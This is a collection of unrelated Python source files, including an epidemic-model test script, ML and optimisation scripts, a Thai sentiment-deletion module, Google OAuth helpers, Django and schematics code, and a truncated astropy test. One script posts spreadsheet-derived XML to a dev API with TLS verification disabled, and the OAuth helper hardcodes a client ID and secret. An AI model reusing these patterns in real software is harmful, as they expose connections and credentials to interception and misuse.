FITTING')\nprint('======================================================================')\n\n\nprint('\\n\\n\\n4. Running automatic fitting...')\nfrom autofit import autofit\nautofit(D, timelimit=timelimit, simstartyear=2000, simendyear=2015, verbose=verbose)\n\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING SCENARIOS')\nprint('======================================================================')\n\n\nprint('\\n\\n\\n3. 
Defining scenarios...')\nscenariolist = [dict() for s in range(3)]\n\n## Current conditions\nscenariolist[0]['name'] = 'Current conditions'\nscenariolist[0]['pars'] = [] # No changes\n\n## Condom use\nscenariolist[1]['name'] = '99% condom use in KAPs'\nscenariolist[1]['pars'] = [dict() for s in range(4)]\n# MSM regular condom use\nscenariolist[1]['pars'][0]['names'] = ['condom','reg']\nscenariolist[1]['pars'][0]['pops'] = 0\nscenariolist[1]['pars'][0]['startyear'] = 2005\nscenariolist[1]['pars'][0]['endyear'] = 2015\nscenariolist[1]['pars'][0]['startval'] = 0.99\nscenariolist[1]['pars'][0]['endval'] = 0.99\n# MSM casual condom use\nscenariolist[1]['pars'][1]['names'] = ['condom','cas']\nscenariolist[1]['pars'][1]['pops'] = 0\nscenariolist[1]['pars'][1]['startyear'] = 2005\nscenariolist[1]['pars'][1]['endyear'] = 2015\nscenariolist[1]['pars'][1]['startval'] = 0.99\nscenariolist[1]['pars'][1]['endval'] = 0.99\n# FSW commercial condom use\nscenariolist[1]['pars'][2]['names'] = ['condom','com']\nscenariolist[1]['pars'][2]['pops'] = 1\nscenariolist[1]['pars'][2]['startyear'] = 2005\nscenariolist[1]['pars'][2]['endyear'] = 2015\nscenariolist[1]['pars'][2]['startval'] = 0.99\nscenariolist[1]['pars'][2]['endval'] = 0.99\n# Client commercial condom use\nscenariolist[1]['pars'][3]['names'] = ['condom','com']\nscenariolist[1]['pars'][3]['pops'] = 5\nscenariolist[1]['pars'][3]['startyear'] = 2005\nscenariolist[1]['pars'][3]['endyear'] = 2015\nscenariolist[1]['pars'][3]['startval'] = 0.99\nscenariolist[1]['pars'][3]['endval'] = 0.99\n\n## Needle sharing\nscenariolist[2]['name'] = 'No needle sharing'\nscenariolist[2]['pars'] = [dict()]\nscenariolist[2]['pars'][0]['names'] = ['sharing']\nscenariolist[2]['pars'][0]['pops'] = 7\nscenariolist[2]['pars'][0]['startyear'] = 2002\nscenariolist[2]['pars'][0]['endyear'] = 2015\nscenariolist[2]['pars'][0]['startval'] = 0.0\nscenariolist[2]['pars'][0]['endval'] = 0.0\n\n\nprint('\\n\\n\\n4. Running scenarios...')\nfrom scenarios import runscenarios\nD = runscenarios(D, scenariolist=scenariolist, verbose=verbose)\n\n\n\n\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING OPTIMIZATION')\nprint('======================================================================')\n\n\n\n\ntestconstant = False\ntestmultibudget = False\ntesttimevarying = False\ntestmultiyear = False\ntestconstraints = True\n\n\n## Set parameters\nprojectname = 'example'\nverbose = 10\nntimepm = 2 # AS: Just use 1 or 2 parameters... using 3 or 4 can cause problems that I'm yet to investigate\nmaxiters = 1e3\nmaxtime = 20 # Don't run forever :)\n\nif maxtime:\n from time import time\n starttime = time()\n def stoppingfunc():\n if time()-starttime>maxtime:\n return True\n else:\n return False\nelse:\n stoppingfunc = None\n \n\n\nif testconstant:\n print('\\n\\n\\n3. Running constant-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testtimevarying:\n print('\\n\\n\\n4. Running constant-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n objectives['timevarying'] = True\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testmultiyear:\n print('\\n\\n\\n5. 
Running multi-year-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n objectives['funding'] = 'variable'\n objectives['outcome']['variable'] = [6e6, 5e6, 3e6, 4e6, 3e6, 6e6] # Variable budgets\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testmultibudget:\n print('\\n\\n\\n6. Running multiple-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n objectives['funding'] = 'range'\n objectives['outcome']['budgetrange']['minval'] = 0\n objectives['outcome']['budgetrange']['maxval'] = 1\n objectives['outcome']['budgetrange']['step'] = 0.5\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testconstraints:\n print('\\n\\n\\n7. Running constrained constant-budget optimization...')\n from optimize import optimize, defaultobjectives, defaultconstraints\n objectives = defaultobjectives(D, verbose=verbose)\n constraints = defaultconstraints(D, verbose=verbose)\n constraintkeys = ['yeardecrease', 'yearincrease', 'totaldecrease', 'totalincrease']\n for key in constraintkeys:\n for p in range(D['G']['nprogs']):\n constraints[key][p]['use'] = True # Turn on all constraints\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n","sub_path":"server/src/sim/test_optima.py","file_name":"test_optima.py","file_ext":"py","file_size_in_byte":7450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330083837","text":"import pytoml as toml\nimport pyinotify\n\nfrom pyautodl.config_parser import parse_config\n\n\nclass ConfigFileWatcher(pyinotify.ProcessEvent):\n compositor = None\n\n def my_init(self, **kargs):\n self.compositor = kargs['compositor']\n\n def process_IN_MODIFY(self, event):\n print(\"Config file modified. 
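test_optima.py caps each optimization run by handing the optimizer a stopping function: a closure over the start time that reports True once the wall-clock budget is spent. A standalone sketch of that pattern (make_stopping_func is an illustrative wrapper around the same idea):

from time import time

def make_stopping_func(max_seconds):
    # Capture the start time once; the returned closure compares against it
    # every time the optimizer polls for whether it should stop.
    start = time()
    def stopping_func():
        return time() - start > max_seconds
    return stopping_func

# stop = make_stopping_func(20)
# optimize(D, objectives=objectives, stoppingfunc=stop)  # optimizer polls stop() between iterations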
Updating caches...\")\n        with open('config.toml', 'rb') as inner_toml:\n            config = toml.load(inner_toml)\n            self.compositor.set_maps(parse_config(config))\n            print(\"Caches updated!\")\n","sub_path":"pyautodl/config_file_watcher.py","file_name":"config_file_watcher.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"245099611","text":"import pandas as pd\nimport numpy as np\nimport requests\n\ndata = pd.read_excel(\"./PreOrders_210423.xlsx\",sheet_name=\"Sheet1\")\nheader = data.columns\nvalues = data.values\nxml = \"\"\nvaluesArray = []\nfor i in range(0,len(values)):\n    d = values[i]\n    xml = \"\"\n    for h in range(0,len(header)):\n        if (str(header[h]) == \"LineItem\"):\n            xml+=\"<\"+str(header[h])+\">\"+\"0000\"+str(d[h])+\"</\"+str(header[h])+\">\"\n        else:\n            xml+=\"<\"+str(header[h])+\">\"+str(d[h])+\"</\"+str(header[h])+\">\"\n    xml = xml.replace(str(np.nan),\"\")\n    xml+=\"\"\n    valuesArray.append(xml)\n    xml = \"\"\nprint(valuesArray)\n\nfor v in valuesArray:\n    xml = v\n    headers = {'Content-Type': 'application/xml'} # set what your server accepts\n    print(requests.post('https://atlas-dev.smythstoys.com/api/sap/order-new',verify=False, data=xml, headers=headers).text)","sub_path":"xmtojsonpy.py","file_name":"xmtojsonpy.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"426156499","text":"#!/usr/bin/env python\n# --------------------------------------------------------------\n# File: testFlight.py\n# Project: Code\n# Created: Friday, 3rd May 2019 10:56:10 am\n# @Author: molin@live.cn\n# Last Modified: Friday, 3rd May 2019 10:56:32 am\n# Copyright © Rockface 2018 - 2019\n# --------------------------------------------------------------\n\nimport os, sys\nimport fileinput\nimport dataAnalysis\nimport pandas as pd\nimport numpy as np\nimport time\nimport plot\n\ninPath = \"/Users/meow/Desktop/DP/Code/Output/MOEA-D/Test28/EP.txt\"\n\ndef formatConfig(outPath):\n\tfor algorithmType in os.listdir(outPath):\n\t\tif not os.path.isdir(os.path.join(outPath, algorithmType)):\n\t\t\tcontinue\n\t\tfor testFolder in os.listdir(os.path.join(outPath, algorithmType)):\n\t\t\ttempPath = os.path.join(os.path.join(outPath, algorithmType), testFolder)\n\t\t\t#print(\"Processing:%s\"%tempPath)\n\t\t\ttempPath = os.path.join(tempPath, \"EP.txt\")\n\t\t\tif not os.path.exists(tempPath):\n\t\t\t\tcontinue\n\n#print(inPath[:-4])\n\ndef deleteHV(inPath):\n\tprint(inPath)\n\ti = 0\n\taddList=[]\n\tfor line in fileinput.input(inPath):\n\t\tif i < 5:\n\t\t\taddList.append(line)\n\t\t\ti+=1\n\t\telse:\n\t\t\tfileinput.close()\n\t\t\tbreak\n\tf = open(inPath, 'w')\n\tfor line in addList:\n\t\tf.write(line)\n\ndef deleteHVOP(inPath):\n\tfor folder in os.listdir(inPath):\n\t\tif folder[0]=='.':\n\t\t\tcontinue\n\t\ttempConfig = os.path.join(inPath, folder)\n\t\tConfig = os.path.join(tempConfig, 'config.txt')\n\t\tif not os.path.exists(tempConfig):\n\t\t\tcontinue\n\t\tdeleteHV(Config)\n\ndef hvOp(inPath):\n\tfor folder in os.listdir(inPath):\n\t\tif folder[0]=='.':\n\t\t\tcontinue\n\t\ttempConfig = os.path.join(inPath, folder)\n\t\tConfig = os.path.join(tempConfig, 'config.txt')\n\t\tif not os.path.exists(tempConfig):\n\t\t\tcontinue\n\t\tdataAnalysis.analysisPF(tempConfig)\n\n#hvOp(\"/Users/meow/Desktop/DP/MOEA-D/Output/NSGA-II\")\n\ndef formatResource(inPath):\n\tdata = pd.read_csv(inPath, sep='\\t')\n\toutPath = inPath[:-4]+'_risk.txt'\n\tdata.sort_values(by='Risk',
ascending=False).to_csv(outPath, sep='\\t', index=False)\n#formatResource(\"/Users/meow/Desktop/DP/MOEA-D/Resource/10000.csv\")\nstart_s1 = time.time()\nprint(\"[Start]\\tCollecting Pareto Front\")\n#dataAnalysis.epochValue(\"/Users/meow/Desktop/DP/MOEA-D/Output/MOEA-D/Test110/EP_epoch.txt\")\n#plot.mat_plotLine(\"/Users/meow/Desktop/DP/MOEA-D/Output/MOEA-D/Test110/EP_epoch_record.csv\")\ndataAnalysis.analysisPF(\"/Users/meow/Desktop/DP/MOEA-D/Output/MOEA-D/Test91\")\nend_s1 = time.time()\nprint(\"[End]\\t%s\"%(end_s1-start_s1))","sub_path":"testFlight.py","file_name":"testFlight.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"227532441","text":"# classification mlp model for the abalone dataset\nfrom numpy import unique\nfrom numpy import argmax\nfrom pandas import read_csv\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\n\n\n# load dataset\nurl = 'https://raw.githubusercontent.com/jbrownlee/Datasets/master/abalone.csv'\ndataframe = read_csv(url, header=None)\ndataset = dataframe.values\n# split into input (X) and output (y) variables\nX, y = dataset[:, 1:-1], dataset[:, -1]\nX, y = X.astype('float'), y.astype('float')\nn_features = X.shape[1]\n# encode strings to integer\ny = LabelEncoder().fit_transform(y)\nprint(y)\nn_class = len(unique(y))\n# split data into train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)\n# define the keras model\nmodel = Sequential()\nmodel.add(Dense(20, input_dim=n_features, activation='relu', kernel_initializer='he_normal'))\nmodel.add(Dense(10, activation='relu', kernel_initializer='he_normal'))\nmodel.add(Dense(n_class, activation='softmax'))\n# compile the keras model\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam')\n# fit the keras model on the dataset\nmodel.fit(X_train, y_train, epochs=150, batch_size=32, verbose=2)\n# evaluate on test set\nyhat = model.predict(X_test)\nyhat = argmax(yhat, axis=-1).astype('int')\nacc = accuracy_score(y_test, yhat)\nprint('Accuracy: %.3f' % acc)","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"517251305","text":"\"\"\"\nclassic knapsack with unlimited item repeats,\nsolved bottom-up with dynamic programming\n\"\"\"\n\nw = 10\nweights = [6,3,4,2]\ncosts = [30,14,16,9]\n\ndef fill_backpack(w, weights, costs):\n    d = [0 for i in range(w+1)]\n\n    for rw in range(w+1):\n        mx = 0\n        for i in range(len(weights)):\n            if rw - weights[i] >= 0:\n                mx = max(mx, d[rw - weights[i]] + costs[i])\n        print(mx)\n        d[rw] = mx\n    print(d)\n    return d[w]\n\n\nprint(fill_backpack(w, weights, costs))\n","sub_path":"dynamic-programming/backpack-classic-repeats.py","file_name":"backpack-classic-repeats.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"58003316","text":"\n# coding: utf-8\n\n# In[27]:\n\nimport pandas as pd\npd.set_option('display.max_rows', 500)\n\n\n# In[30]:\n\nbasic_stats=pd.read_csv('/Users/katya/Desktop/bruno_mega/basicstats/basicstats.txt', index_col=4,
sep='\\t')\nbasic_stats.drop(basic_stats.columns[[0,1,2,3,4,9,10,12]], axis=1, inplace=True)\n\n\n# In[32]:\n\nbasic_stats.to_csv('/Users/katya/Desktop/bruno_mega/basicstats/basicstats.txt',sep='\\t')\n\n\n# In[ ]:\n\n\n\n","sub_path":"basic_stats.py","file_name":"basic_stats.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340840440","text":"import torch\nimport os\nimport sys\nimport json\nimport numpy as np\nimport pandas as pd\nfrom tqdm.auto import tqdm\nimport collections\nimport string\nimport re\nimport transformers\nfrom transformers import (\n AutoTokenizer,\n AutoModelForSequenceClassification,\n pipeline,\n)\nfrom thai2transformers import preprocess\nfrom thai2transformers.preprocess import process_transformers\n\n#Parameters:\nparam_smooth = 10\nparam_threshold = 0.9\nparam_span = 4\n\nparam_backoff_limit = 3\n\ndef read_text_file(filename):\n f = open(f'./data/preprocessed/{filename}', \"r\", encoding=\"utf-8\")\n d_ = []\n for x in f:\n d_.append(x.strip())\n return d_\n\ndef read_all_datasets():\n d_pos = read_text_file('pos_post_process_all.txt')\n d_neg = read_text_file('neg_post_process_all.txt')\n\n tcas_pos = read_text_file('tcas61_pos.txt')\n tcas_neg = read_text_file('tcas61_neg.txt')\n\n review_pos = read_text_file('review_shopping_pos.txt')\n review_neg = read_text_file('review_shopping_neg.txt')\n\n general_pos = read_text_file('general_pos.txt')\n general_neg = read_text_file('general_neg.txt')\n\n all_pos = d_pos + tcas_pos + review_pos + general_pos\n all_neg = d_neg + tcas_neg + review_neg + general_neg\n\n return all_pos, all_neg\n\n\ntokenizer = AutoTokenizer.from_pretrained('airesearch/wangchanberta-base-att-spm-uncased',\n revision='finetuned@wisesight_sentiment')\n\nmodel = AutoModelForSequenceClassification.from_pretrained('airesearch/wangchanberta-base-att-spm-uncased',\n revision='finetuned@wisesight_sentiment',\n output_attentions=False)\nclassify_multiclass = pipeline(task='sentiment-analysis',\n tokenizer=tokenizer,\n model = model)\n\n\n##################################\n##### Frequency Ratio Method #####\n\n##### N-granms ###################\n#ngram has punctuation\ndef has_punctuation(ngram): \n return True in [x in string.punctuation for x in ngram]\n\ndef generate_ngrams(lines, min_length=1, max_length=param_span):\n lengths = range(min_length, max_length + 1)\n ngrams = {length: [] for length in lengths}\n queue = collections.deque(maxlen=max_length)\n \n def add_queue():\n current = tuple(queue)\n for length in lengths:\n if len(current) >= length and not has_punctuation(current[:length]) and current[:length] not in ngrams[length]:\n ngrams[length].append(current[:length])\n \n short_by = 0\n for line in lines:\n short_by = max(0, max_length - len(lines))\n for word in tokenizer.tokenize(process_transformers(line)):\n queue.append(word)\n if len(queue) >= max_length-short_by:\n add_queue() \n\n while len(queue) > min_length:\n queue.popleft()\n add_queue()\n return ngrams\n\n#modified from & fixed their error of ngram with # of words < 4: https://gist.github.com/benhoyt/dfafeab26d7c02a52ed17b6229f0cb52\ndef count_ngrams(lines, min_length=1, max_length=param_span):\n \"\"\"Iterate through given lines iterator (file object or list of\n lines) and return n-gram frequencies. 
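count_ngrams in delete_module.py slides a bounded deque over the token stream so that all n-grams of length 1 through param_span are tallied in a single pass. A condensed sketch of the same queue-and-Counter idea (this variant counts the n-grams ending at each token, which avoids the tail-flush loop the original needs):

import collections

def simple_ngram_counts(tokens, max_length=4):
    # One Counter per n-gram length, filled from a sliding window of tokens.
    counts = {n: collections.Counter() for n in range(1, max_length + 1)}
    window = collections.deque(maxlen=max_length)
    for tok in tokens:
        window.append(tok)
        current = tuple(window)
        # Tally every n-gram that ends at the token just appended.
        for n in range(1, len(current) + 1):
            counts[n][current[-n:]] += 1
    return counts

# simple_ngram_counts("a b a b".split())[2] == Counter({('a', 'b'): 2, ('b', 'a'): 1})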
The return value is a dict\n    mapping the length of the n-gram to a collections.Counter\n    object of n-gram tuple and number of times that n-gram occurred.\n    Returned dict includes n-grams of length min_length to max_length.\n    \"\"\"\n    lengths = range(min_length, max_length + 1)\n    ngrams = {length: collections.Counter() for length in lengths}\n    queue = collections.deque(maxlen=max_length)\n\n    # Helper function to add n-grams at start of current queue to dict\n    def add_queue():\n        current = tuple(queue)\n        for length in lengths:\n            if len(current) >= length and not has_punctuation(current[:length]):\n                ngrams[length][current[:length]] += 1\n\n    # Loop through all lines and words and add n-grams to dict\n    short_by = 0\n    for line in lines:\n        short_by = max(0, max_length - len(lines))\n        # for word in line.split():\n        for word in tokenizer.tokenize(process_transformers(line)):\n            queue.append(word)\n            if len(queue) >= max_length - short_by:\n                add_queue()\n\n    # Make sure we get the n-grams at the tail end of the queue\n    while len(queue) > min_length:\n        queue.popleft()\n        add_queue()\n\n    return ngrams\n\ndef get_counts(list1, counted_ngrams):\n    counts = []\n    list1_ngrams = generate_ngrams(list1)\n    # print(list1_ngrams)\n    list2_counts = counted_ngrams\n\n    for length in range(param_span, 0, -1):\n        for v in list1_ngrams[length]:\n            counts.append([list2_counts[length][v], v])\n    return np.array(counts)\n\nclass ngrams_counts():\n    global read_all_datasets, count_ngrams\n    def __init__(self):\n        all_pos, all_neg = read_all_datasets()\n        self.pos_ngrams = count_ngrams(all_pos)\n        self.neg_ngrams = count_ngrams(all_neg)\n\n##### Getting Attribute and Context #########\n\n# these are methods that will become useful when extracting attribute markers\n# why do we need all this? well... that's like 5 hours of debugging...\ndef flatten(foo):\n    return list(_flatten(foo))\n\ndef _flatten(foo):\n    for x in foo:\n        if isinstance(x, collections.abc.Iterable) and not isinstance(x, str):\n            for y in _flatten(x):\n                yield y\n        else:\n            yield x\n\ndef array_to_string(a):\n    return ' '.join(flatten(a))\n\ndef is_in_string_array(elements, original): # deprecated, does not take into account sequence order\n    the_elements = [x for x in array_to_string(elements).split() if x != '▁']\n    the_original = array_to_string(original).split()\n    # print('test:', the_elements, the_original, np.isin(the_elements, the_original).any())\n    return np.isin(the_elements, the_original).any()\n\ndef insert_string(string, inserted_string, index):\n    return string[:index] + inserted_string + string[index:]\n\n# modified from https://stackoverflow.com/questions/41752946/replacing-a-character-from-a-certain-index\ndef replace_string(s, newstring, index, nofail=False):\n    # raise an error if index is outside of the string\n    if not nofail and index not in range(len(s)):\n        raise ValueError(\"index outside given string.
index: \" + str(index))\n\n    # if not erroring, but the index is still not in the correct range..\n    if index < 0: # add it to the beginning\n        return newstring + s\n    if index > len(s): # add it to the end\n        return s + newstring\n\n    # insert the new string between \"slices\" of the original\n    return s[:index] + newstring + s[index + len(newstring):]\n\ndef get_attribute_markers(s, style_src, pos_ngrams_counts, neg_ngrams_counts):\n    sentence = [s]\n\n    pos_counts = get_counts(sentence, pos_ngrams_counts)\n    pos_ngrams = pos_counts[:,1]\n    if len(pos_counts) > 0:\n        pos_counts = pos_counts[:,0]\n\n    neg_counts = get_counts(sentence, neg_ngrams_counts)\n    neg_ngrams = neg_counts[:,1]\n    if len(neg_counts) > 0:\n        neg_counts = neg_counts[:,0]\n\n    label = 'neg'\n    if(style_src):\n        importances = (pos_counts + param_smooth) / (neg_counts + param_smooth)\n        ngrams = pos_ngrams\n        label = 'pos'\n    else:\n        importances = (neg_counts + param_smooth) / (pos_counts + param_smooth)\n        ngrams = neg_ngrams\n\n    a = []\n\n    importances = np.vstack((importances, ngrams)).T\n\n    for importance in sorted(importances,key=lambda x:(x[0],-len(x[1])),reverse=True):\n        if importance[0] > param_threshold and not is_in_string_array(importance[1], a) and classify_multiclass(' '.join(importance[1]))[0]['label']==label:\n            a.append(' '.join(importance[1]))\n\n    return a\n\ndef separate(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts):\n    attributes = get_attribute_markers(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts)\n    c = sentence\n\n    replace_indexes = []\n    for a in attributes:\n        a_striped = a.strip('▁').replace(' ','')\n        replace_index = c.find(a_striped)\n        replace_indexes.append(replace_index)\n        if a_striped != \"\":\n            c = c.replace(a_striped, \"\")\n\n    if len(attributes) == 0:\n        return {'c': c, 'a': [], 'i': [], 's': sentence}\n\n    replace_indexes, attributes = zip(*sorted(zip(replace_indexes, attributes)))\n    return {'c': c, 'a': attributes, 'i': replace_indexes, 's': sentence}\n\ndef get_c_and_a(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts):\n    sep_res = separate(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts)\n    c = re.sub(' +', ' ', sep_res['c'])\n    a = sep_res['a']\n    return c,a\n\ndef delete_negative(sentence, pos_ngrams_counts, neg_ngrams_counts):\n    sep_res = separate(sentence, 0, pos_ngrams_counts, neg_ngrams_counts)\n    c = re.sub(' +', ' ', sep_res['c'])\n    a = sep_res['a']\n    return a,c,sentence\n\n# import delete_module as delete\n# ngrams = delete.ngrams_counts()\n# delete_output = delete.delete_negative(src_sentence, ngrams.pos_ngrams, ngrams.neg_ngrams)\n### output example: (('แย่มาก',), 'ร้านนี้', 'ร้านนี้แย่มาก')","sub_path":"delete_module.py","file_name":"delete_module.py","file_ext":"py","file_size_in_byte":9290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"573015090","text":"from oauth2client import client\nfrom oauth2client import keyring_storage\nfrom oauth2client import tools\nimport os\n\n# Google API details for a native/installed application for API project grow-prod.\nCLIENT_ID = '578372381550-jfl3hdlf1q5rgib94pqsctv1kgkflu1a.apps.googleusercontent.com'\nCLIENT_SECRET = 'XQKqbwTg88XVpaBNRcm_tYLf' # Not so secret for installed apps.\nREDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'\n\n\ndef get_credentials(scope, storage_key='Grow SDK'):\n    username = os.getenv('AUTH_EMAIL_ADDRESS', 'default')\n    storage = keyring_storage.Storage(storage_key, username)\n    credentials =
storage.get()\n if credentials is None:\n parser = tools.argparser\n if os.getenv('INTERACTIVE_AUTH'):\n args = []\n else:\n args = ['--noauth_local_webserver']\n flags, _ = parser.parse_known_args(args)\n flow = client.OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, scope,\n redirect_uri=REDIRECT_URI)\n credentials = tools.run_flow(flow, storage, flags)\n return credentials\n","sub_path":"grow/common/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498573450","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nif 'django.contrib.flatpages' in settings.INSTALLED_APPS:\n from django.contrib.flatpages.models import FlatPage\n\n class FlatpageForm(forms.ModelForm):\n\n url = forms.RegexField(label=_(\"URL\"), max_length=100,\n help_text=_(\"Example: '/about/contact/'. Make sure to have leading\"\n \" and trailing slashes.\"),\n error_message=_(\"This value must contain only letters, numbers,\"\n \" underscores, dashes or slashes.\"),\n regex=r'^[-\\w/\\.~]+$')\n\n class Meta:\n model = FlatPage\n\n def __init__(self, *args, **kwargs):\n super(FlatpageForm, self).__init__(*args, **kwargs)\n if getattr(settings, 'USE_CKEDITOR', True):\n from ckeditor.widgets import CKEditorWidget\n\n self.fields['content'].widget = CKEditorWidget()\n","sub_path":"about/adminforms.py","file_name":"adminforms.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"400652421","text":"f = open('82.txt', 'r')\nmat = list(map(lambda x: list(map(int, x.split(','))),\n filter(lambda x: len(x) != 0, f.read().split('\\n'))))\n\nfor j in range(1, len(mat[0])):\n for i in range(len(mat) - 1):\n mat[i+1][j-1] = min(mat[i+1][j-1], mat[i][j-1] + mat[i][j])\n for i in range(len(mat) - 1, 0, -1):\n mat[i-1][j-1] = min(mat[i-1][j-1], mat[i][j-1] + mat[i][j])\n for i in range(len(mat)):\n mat[i][j] += mat[i][j-1]\n\nprint(min(map(lambda x: x[-1], mat)))\n","sub_path":"page02/82.py","file_name":"82.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77842906","text":"# -*- coding:utf-8 -*-\nfrom schematics_proto3.models import Model\n\n\ndef parametrize_for(tag):\n def _decorator(func):\n func._paramertize_for = tag\n\n return func\n return _decorator\n\n\nclass CommonWrappersTests:\n\n field_type_class = NotImplemented\n protobuf_msg_class = NotImplemented\n\n def pytest_generate_tests(self, metafunc):\n param_rule = getattr(metafunc.function, '_paramertize_for', None)\n\n model_class_optional = self.get_model_class_optional()\n model_class_none_not_dumped = self.get_model_class_none_not_dumped()\n model_class_renamed = self.get_model_class_renamed()\n\n value = self.get_value()\n\n if param_rule == 'serializing + field set cases':\n metafunc.parametrize(\n 'field_name,model',\n [\n ('wrapped', model_class_optional({'wrapped': value})),\n ('wrapped', model_class_none_not_dumped({'wrapped': value})),\n ('custom_name', model_class_renamed({'custom_name': value})),\n ],\n ids=[\n 'optional+all_set',\n 'none_not_dumped+all_set',\n 'renamed+all_set',\n ]\n )\n if param_rule == 'not serializing + field unset cases':\n metafunc.parametrize(\n 'field_name,model',\n [\n ('wrapped', model_class_none_not_dumped({})),\n ],\n 
ids=[\n 'none_not_dumped+unset',\n ]\n )\n if param_rule == 'serializing + field unset cases':\n metafunc.parametrize(\n 'field_name,model',\n [\n ('wrapped', model_class_optional({})),\n ('custom_name', model_class_renamed({})),\n ],\n ids=[\n 'optional+unset',\n 'renamed+unset',\n ]\n )\n\n def get_model_class_optional(self):\n class ModelOptional(Model, protobuf_message=self.protobuf_msg_class):\n wrapped = self.field_type_class()\n\n return ModelOptional\n\n def get_model_class_none_not_dumped(self):\n class ModelNoneNotDumped(Model, protobuf_message=self.protobuf_msg_class):\n wrapped = self.field_type_class()\n\n class Options:\n serialize_when_none = False\n\n return ModelNoneNotDumped\n\n def get_model_class_renamed(self):\n class ModelFieldRenamed(Model, protobuf_message=self.protobuf_msg_class):\n custom_name = self.field_type_class(metadata=dict(protobuf_field='wrapped'))\n\n return ModelFieldRenamed\n\n # value getters\n\n def get_value(self):\n raise NotImplementedError()\n\n def get_zero_value(self):\n raise NotImplementedError()\n\n # test cases\n\n @parametrize_for('serializing + field set cases')\n def test_serialize_message__all_set(self, field_name, model):\n nat = model.to_native()\n pri = model.to_primitive()\n msg = model.to_protobuf()\n\n assert nat[field_name] == self.get_value()\n assert pri[field_name] == self.get_value()\n assert msg.wrapped.value == self.get_value()\n\n @parametrize_for('not serializing + field unset cases')\n def test_skip_serialize_message__unsets(self, field_name, model):\n nat = model.to_native()\n pri = model.to_primitive()\n msg = model.to_protobuf()\n\n assert nat == {}\n assert pri == {}\n assert msg.wrapped.value == self.get_zero_value()\n\n @parametrize_for('serializing + field unset cases')\n def test_serialize_message__unsets(self, field_name, model):\n nat = model.to_native()\n pri = model.to_primitive()\n msg = model.to_protobuf()\n\n assert nat[field_name] is None\n assert pri[field_name] is None\n assert msg.wrapped.value == self.get_zero_value()\n","sub_path":"tests/serializing/wrappers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48100832","text":"\n\nfrom xai.brain.wordbase.nouns._amnesty import _AMNESTY\n\n#calss header\nclass _AMNESTIED(_AMNESTY, ):\n\tdef __init__(self,): \n\t\t_AMNESTY.__init__(self)\n\t\tself.name = \"AMNESTIED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"amnesty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_amnestied.py","file_name":"_amnestied.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427284885","text":"from unittest import TestCase, skip\n\nfrom astropy import units as u\nimport numpy as np\n\nfrom mirage.util import Region, PixelRegion, Vec2D\n\n\nclass TestPixelRegion(TestCase):\n\n def testDelta_success(self):\n region = PixelRegion(dims=Vec2D(5, 5, \"m\"), resolution=Vec2D.unitless(4, 5))\n delta = region.delta\n\n expected = Vec2D(5 / 4, 5 / 5, 